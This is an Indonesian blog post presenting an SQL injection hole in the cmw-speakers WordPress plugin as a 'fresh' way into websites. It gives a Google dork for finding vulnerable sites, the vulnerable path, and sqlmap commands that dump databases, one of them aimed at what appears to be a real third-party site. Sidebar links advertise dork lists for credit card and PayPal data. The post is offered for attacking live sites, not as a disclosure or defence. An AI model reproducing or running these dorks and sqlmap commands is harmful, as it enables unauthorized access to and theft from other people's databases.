Wordpress cmw-speakers Plugin SQL-injection Vulnerability in Parrot os linux

Assalamualaikum Wr.Wb.
atas di beri nya nikmat dan kesehatan maupun rizki dari Allah SWT, Saya Mr.GagalTotal666 kali ini akan share cara metode celah pada Wordpress yaitu :
Plugins/cmw-Speakers_details.php?id=
cara ini masih fresh dan segar ^_^ , tetapi hanya sebagian pihak website yang menggunakan wordpress sudah ada mengetahui celah ini , jadi hanya beberapa websites yang ada kemungkinan Vlunerability.

#################################
| Dork : inurl:/speaker_details.php?id=
| version : ALL
| Tested on: [Parrot os]
| Date: 18/01/2017
#################################

Exploit :
|http://127.0.0.1/wp-content/plugins/cmw-speakers/speaker_details.php?id=

Sqlmap Poc :
sqlmap -u "http://target.com/wp-content/plugins/cmw-speakers/speaker_details.php?id=558" -p id --dbs
sqlmap -u "http://cmw.net/radio/wp-content/plugins/cmw-speakers/speaker_details.php?id=558" --dbs

berikut contoh hasil database :

simak video dibawah ini :

mohon maaf jika video ada kesalahan dan kekurangan nya ^_^ saya juga masih belajar
sekian tutorial nya semoga bermanfaat ^_^

GagalTotal666

Wordpress cmw-speakers Plugin SQL-injection Vulnerability in Parrot os linux

Post a Comment

0 Comments

Popular Posts

Update Dork Credit Card dan Paypal List di 2018 Fresh For SQLi

Kumpulan Dork Ampuh CC dan Paypal Full

Cara mengatasi Error "E: Unable To Locate package" di Linux

Translate

Youtube

Footer Menu Widget

GagalTotal666

Wordpress cmw-speakers Plugin SQL-injection Vulnerability in Parrot os linux

You may like these posts

Post a Comment

0 Comments

Popular Posts

Update Dork Credit Card dan Paypal List di 2018 Fresh For SQLi

Kumpulan Dork Ampuh CC dan Paypal Full

Cara mengatasi Error "E: Unable To Locate package" di Linux

Translate

Youtube

Footer Menu Widget